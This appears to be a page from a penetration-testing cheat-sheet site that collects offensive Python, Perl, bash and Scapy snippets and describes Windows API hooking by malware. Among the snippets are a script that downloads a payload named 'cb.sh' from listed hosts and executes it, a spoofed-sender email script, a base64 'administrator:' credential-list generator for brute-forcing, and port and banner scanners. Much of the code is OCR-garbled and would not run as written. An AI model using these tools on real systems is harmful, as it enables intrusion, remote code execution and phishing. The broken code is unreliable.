Comment on page

Programming

Programming
Port scanner in python
import socket as sk
for port in range (1, 1024):
     try:
         s=sk. socket (sk. AF _ INET, sk. SOCK_ STREAM)
         s.settimeout(1000)
         s. connect ( (' 127. 0. 0. 1 ' , port) )
         print '%d:OPEN' % (port)
         s.close
     except: continue
Generating base64 words in Python
#!/usr/bin/pjthon
import base64
filel=open("pwd.lst","r")
file2=open("b64pwds.lst","w")
for line in file1:
     clear= "administrator:"+ str.strip(line)
     new= base64.encodestring(clear)
     file2.write(new)
Convert Windows registry from hex to ascii in Python
import binascii, sys, string
dataFormatHex = binascii.a2b_hex(sys.argv[1])
output = ""
for char in dataFormatEx:
     if char in string.printable: output += char
     else: output += "."
print ''\n'' + output
Reading all folder files and searching with regex in Python
import glob, re
for msg in glob.glob('/tmp/.txt'):
     filer = open((msg), 'r')
     data = file.read()
     message= re.findall(r' message (.'?) /message ', data, re.DOTALL)
     print "File %s contains %s" % (str(msg), message)
     fi1er.c1ose()
Building an encrypted web server with ssl in Python
# Create SSL cert (follow prompts for customization)
   openssl req -new -x509 -keyout cert.pem -out cert.pern -days 365 -nodes
​
#Create httpserver.pj
   import BaseHTTPServer, SimpleHTTPServer, ssl
​
cert="cert.pem"
httpd = BaseHTTPServer.HTTPServer( ('192.168.1.10' ,443),
Simp1eHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap socket(httpd.socket,certflle=cert,server side=True)
httpd.serve_forever()
Web server with Python
python -m SimpleHTTPServer 8080
Sending email in python (* sendmail must be installed)
#!/usr/bin/python
import smtplib, string
import os, time
​
os.system("/etc/init.d/sendmail start")
time.sleep(4)
​
    HOST = "localhost"
    SUBJECT = "Email from spoofed sender"
    TO = "[email protected]"
    FROM= "[email protected]"
    TEXT = "Message Body"
    BODY = string.join( (
            "From: %s" % FROH,
            "To: %s" % TO,
            "Subject: %s" % SUBJECT ,
            "",
            TEXT
            ) , "\r\n")
server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server. quit ()
time.sleep(4)
os.system("/etc/init.d/sendmail stop")
Get the file from http and run it
#!/usr/bin/python
import urllib2, os
​
urls = [ "1 1.1.1.1","2.2.2.2"]
port = "80"
payload = "cb.sh"
​
for url in urls:
    u = "http://%s:%s/%s" % (url, port, payload)
    try:
        r = urllib2.urlopen(u)
        wfile = open{"/tmp/cb.sh", "wb")
        wfile.write(r.read())
        wfile. close ()
        break
    except: continue
​
if os.path.exists("/tmp/cb.sh"):
    os.system("chmod 700 /tmp/cb.sh")
    os. system ( "/tmp/cb. sh")
Receiving the banner in python (* the range of ip and ports and its delay should be specified)
#!/usr/bin/python
import urllib2, sys, time
​
from optparse import OptionParser
​
parser = OptionParser()
parser.add option{''-t'', dest=''iprange'', help=''target IP range, i.e.
192.168.1.1-25")
parser.add option(''-p'', dest=''port'',default=''80'',help=''port, default=BO'')
parser.add=option("-d", dest="delay",default=".5",help="delay (in seconds),
default=.5 seconds")
​
(opts, args) = parser.parse_args()
​
if opts.iprange is None:
     parser.error("you must supply an IP range")
​
ips = []
headers={}
​
octets= opts.iprange.split(' .')
​
start= octets[3] .split('-') [0]
stop = octets [3]. split ( '-' ) [ 1 ]
​
for i in range(int(start),int(stop)+1):
     ips.append('%s.%s.%s.%d' % (octets[O],octets[1] ,octets[2],i))
print '\nScanning IPs: %s\n' % (ips)
​
for ip in ips:
     try:
         response= urllib2.urlopen('http://%s:%s' % (ip,opts.port))
         headers[ip] = dict(response.info())
     except Exception as e:
         headers[ip] = "Error: " + str(e)
        
time.sleep(float(opts.delay))
​
for header in headers:
     try:
         print '%s : %s' % (header,headers[header] .get('server'))
     except:
         print '%s : %s' % (header,headers[header])
Scrapy command
When you craft TCP packets with Scapy, the underlying OS will not recognize the initial SYN packet and will reply with a RST packet. To mitigate this you need to set the following Iptables rule: iptables -A OUTPUT -p tcp –tcp-flags RST RST -j DROP
phrase
Explanation
from scapy.all import *
Loading all scapy libraries
ls ()
List of all protocols
lsc ()
list of all functions
conf
Display and settings
IP(src=RandiP())
Generate random destination IP
Ether(src=RandMAC() I
Generate random destination MAC
ip=IP(src=”1.1.1.1”,dst=”2.2.2.2”)
Change the ip parameter
tcp=TCP(dport=”443”)
Change the tcp parameter
data= “TCP data”
specify the data part
packet=ip/tcp/data
Create ip and tcp package
packet.show()
Show package settings
send(packet,count=1)
send 1 packet to layer 3
sendp(packet,count=2)
Send 2 packets to layer 3
sendpfast(packet)
Send faster with tcpreply
sr(packet)
Send 1 package and get the result
sr1(packet)
Post only one reply
for i in range(0,1000): send (packet·)
Send a set a thousand times
sniff(count=100,iface=eth0)
Listen for hundred packets on eth0
Send icmp message on ipv6
sr ( IPv6 ( src=" ipv6 ", dst="ipv6")/ ICMP ())
udp package and payload
ip=IP(src="ip", dst="ip")
u=UDP(dport=1234, sport=5678)
pay = "my UDP packet"
packet=ip/u/pay
packet.show()
wrpcap ("out.pcap",packet):write to pcap
send(packet)
Ntp fuzzer operation
packet=IP(src="ip" ,dst="ip")/UDP(dport=l23)/fuzz(NTP(version=4,mode=4))
Send message http
from scapy.all import *
# Add iptables rule to block attack box from sending RSTs
# Create web.txt with entire GET/POST packet data
fileweb = open("web.txt",'r')
data = fileweb.read()
ip = IP(dst="ip")
SYN=ip/TCP(rport=RandNum(6000,7000),dport=BO,flags="S",seq=4)
SYNACK = sr1(SYN)
ACK=ip/TCP(sport=SYNACK.dport,dport=BO,flags="A",seq=SYNACK.ack,ack=SYNACK.
seq+l)/data
reply, error = sr(ACK)
print reply.show()
Perl language
Port scanner
use strictly; use IO::Socket;
for($port=0;$port 65535;$port++) {
$remote=IO::Socket::INET-new(
Proto= "tcp",PeerAddr= "127.0.0.1",PeerPort= $port);
if($remote) {print "$port is open\n"); )
regex rules
Law
Explanation
^ start
 
* Zero or more
 
+ one or more
 
?
Zero or one
.
All characters up to 
{3} Exactly three
 
{3,}
Three or more
{3,5}
Three or four or five
{3|5}
Three or five
[345]
Three or four or five
[ ^34]
Apart from three or four
[a-z]
letters a-z
[A-Z]
Letters A-Z
[0-9]
Digits 0-9
\d
Digits
\D
Except for the digit
\w
All A-Z, a-z, 0-9
\W
Except A-Z,a-z,0-9
\s
Empty space (\t\r\n\f)
\S
Except (\t\r\n\f)
reg[ex]
“rege” or “regx”
regex?
'’rege’’ or ‘‘regex’’
regex*
``rege’’ w/ 0 or more x
regex+
``rege’’ w/ 1 or more x
[Rr]egex
'’Regex’’ or ‘‘regex’’
\d{3}
Exactly three digits
\d{ 3,)
Three or more digits
[aeiou]
Each one
(0 [3-9] |1 [0-9]|2 [0-5])
Range 03 to 25
nested extract with bash
#!/bin/bash
RESULT=0
while [ $RESULT -eq 0 ]
do
PASSWORD="PASSWORD"
ZIPFILE="$( ls *.zip )"
unzip -P "$PASSWORD" "$ZIPFILE"
RESULT=$?
echo "Unzipped $ZIPFILE using password $PASSWORD ($RESULT)"
cd flag
done
Some examples of commonly hooked Windows API functions
API
Description
CreateProcess
This API function is used to start a new process. By hooking this function, malware can intercept calls to create new processes and inject its code into them, allowing it to execute in the context of the newly created process.
LoadLibrary/LoadLibraryEx
These functions are used to load dynamic link libraries (DLLs) into a process’s address space. By hooking these functions, malware can inject its code into a target process by loading a malicious DLL.
RegOpenKeyEx/RegCreateKeyEx
These functions are used to access and create registry keys. By hooking these functions, malware can monitor and modify the registry, which can be used to maintain persistence or evade detection.
NtCreateFile/NtOpenFile
These functions are used to create or open files on disk. By hooking these functions, malware can intercept calls to access sensitive files, such as password files or system configuration files.
SendMessage
This function is used to send a message to a window or control in a user interface. By hooking this function, malware can monitor and modify user input, which can be used to steal sensitive information such as login credentials or credit card numbers.
CreateFile
this API is used to create or open a file, and is often hooked to allow malware to hide its own files or open and modify existing files.
RegOpenKeyEx
this API is used to open a registry key, and is often hooked to allow malware to modify or delete registry keys, which can be used for persistence or to disable security software.
InternetConnect
this API is used to connect to a remote server over the internet, and is often hooked to allow malware to communicate with a command and control server.
LoadLibrary
this API is used to load a dynamic link library (DLL) into memory, and is often hooked to allow malware to load its own DLLs or to hijack legitimate DLLs.
SetWindowsHookEx
this API is used to install a hook procedure for a specific system-wide event, such as a keystroke or mouse click, and is often hooked to allow malware to monitor user activity or to inject code into other processes.
CreateFile
used to create or open a file or device object. Hooking this API can allow malware to intercept attempts to access certain files or devices, and potentially modify or redirect those requests.
SetWindowsHookEx
used to set a system-wide or thread-specific hook procedure for certain types of events, such as mouse or keyboard input. Hooking this API can allow malware to monitor or manipulate user input or system behavior.
InternetConnect
used to establish a connection to an FTP, HTTP, or HTTPS server. Hooking this API can allow malware to intercept or modify network traffic, potentially allowing it to steal sensitive information or carry out other malicious actions.
CreateProcessA/W
used to create a new process. Malware can hook this API to inject code into a legitimate process or to hide its presence by running as a child process of a legitimate application.
RegCreateKeyExA/W
used to create a new registry key. Malware can hook this API to create persistence by creating a new registry key that will ensure the malware runs every time the system is started.
GetProcAddress
used to retrieve the address of a function in a DLL module. Malware can hook this API to hide its presence by preventing security software from detecting the functions it is using.
InternetConnectA/W
used to connect to an FTP, HTTP, or HTTPS server. Malware can hook this API to steal sensitive data such as passwords and login credentials.
NtQuerySystemInformation
used to retrieve system information such as running processes and drivers. Malware can hook this API to hide its presence by preventing security software from detecting its processes and drivers.
NtQuerySystemInformation
this API is commonly hooked by malware to hide its processes and drivers, making it more difficult for security software to detect its presence on the system.

Guides - Previous

Databases

Next - Guides

Wireless

Last modified 1mo ago

phrase	Explanation
from scapy.all import *	Loading all scapy libraries
ls ()	List of all protocols
lsc ()	list of all functions
conf	Display and settings
IP(src=RandiP())	Generate random destination IP
Ether(src=RandMAC() I	Generate random destination MAC
ip=IP(src=”1.1.1.1”,dst=”2.2.2.2”)	Change the ip parameter
tcp=TCP(dport=”443”)	Change the tcp parameter
data= “TCP data”	specify the data part
packet=ip/tcp/data	Create ip and tcp package
packet.show()	Show package settings
send(packet,count=1)	send 1 packet to layer 3
sendp(packet,count=2)	Send 2 packets to layer 3
sendpfast(packet)	Send faster with tcpreply
sr(packet)	Send 1 package and get the result
sr1(packet)	Post only one reply
for i in range(0,1000): send (packet·)	Send a set a thousand times
sniff(count=100,iface=eth0)	Listen for hundred packets on eth0

Law	Explanation
^ start
* Zero or more
+ one or more
?	Zero or one
.	All characters up to
{3} Exactly three
{3,}	Three or more
{3,5}	Three or four or five
{3\|5}	Three or five
[345]	Three or four or five
[ ^34]	Apart from three or four
[a-z]	letters a-z
[A-Z]	Letters A-Z
[0-9]	Digits 0-9
\d	Digits
\D	Except for the digit
\w	All A-Z, a-z, 0-9
\W	Except A-Z,a-z,0-9
\s	Empty space (\t\r\n\f)
\S	Except (\t\r\n\f)
reg[ex]	“rege” or “regx”
regex?	'’rege’’ or ‘‘regex’’
regex*	``rege’’ w/ 0 or more x
regex+	``rege’’ w/ 1 or more x
[Rr]egex	'’Regex’’ or ‘‘regex’’
\d{3}	Exactly three digits
\d{ 3,)	Three or more digits
[aeiou]	Each one
(0 [3-9] \|1 [0-9]\|2 [0-5])	Range 03 to 25

API	Description
CreateProcess	This API function is used to start a new process. By hooking this function, malware can intercept calls to create new processes and inject its code into them, allowing it to execute in the context of the newly created process.
LoadLibrary/LoadLibraryEx	These functions are used to load dynamic link libraries (DLLs) into a process’s address space. By hooking these functions, malware can inject its code into a target process by loading a malicious DLL.
RegOpenKeyEx/RegCreateKeyEx	These functions are used to access and create registry keys. By hooking these functions, malware can monitor and modify the registry, which can be used to maintain persistence or evade detection.
NtCreateFile/NtOpenFile	These functions are used to create or open files on disk. By hooking these functions, malware can intercept calls to access sensitive files, such as password files or system configuration files.
SendMessage	This function is used to send a message to a window or control in a user interface. By hooking this function, malware can monitor and modify user input, which can be used to steal sensitive information such as login credentials or credit card numbers.
CreateFile	this API is used to create or open a file, and is often hooked to allow malware to hide its own files or open and modify existing files.
RegOpenKeyEx	this API is used to open a registry key, and is often hooked to allow malware to modify or delete registry keys, which can be used for persistence or to disable security software.
InternetConnect	this API is used to connect to a remote server over the internet, and is often hooked to allow malware to communicate with a command and control server.
LoadLibrary	this API is used to load a dynamic link library (DLL) into memory, and is often hooked to allow malware to load its own DLLs or to hijack legitimate DLLs.
SetWindowsHookEx	this API is used to install a hook procedure for a specific system-wide event, such as a keystroke or mouse click, and is often hooked to allow malware to monitor user activity or to inject code into other processes.
CreateFile	used to create or open a file or device object. Hooking this API can allow malware to intercept attempts to access certain files or devices, and potentially modify or redirect those requests.
SetWindowsHookEx	used to set a system-wide or thread-specific hook procedure for certain types of events, such as mouse or keyboard input. Hooking this API can allow malware to monitor or manipulate user input or system behavior.
InternetConnect	used to establish a connection to an FTP, HTTP, or HTTPS server. Hooking this API can allow malware to intercept or modify network traffic, potentially allowing it to steal sensitive information or carry out other malicious actions.
CreateProcessA/W	used to create a new process. Malware can hook this API to inject code into a legitimate process or to hide its presence by running as a child process of a legitimate application.
RegCreateKeyExA/W	used to create a new registry key. Malware can hook this API to create persistence by creating a new registry key that will ensure the malware runs every time the system is started.
GetProcAddress	used to retrieve the address of a function in a DLL module. Malware can hook this API to hide its presence by preventing security software from detecting the functions it is using.
InternetConnectA/W	used to connect to an FTP, HTTP, or HTTPS server. Malware can hook this API to steal sensitive data such as passwords and login credentials.
NtQuerySystemInformation	used to retrieve system information such as running processes and drivers. Malware can hook this API to hide its presence by preventing security software from detecting its processes and drivers.
NtQuerySystemInformation	this API is commonly hooked by malware to hide its processes and drivers, making it more difficult for security software to detect its presence on the system.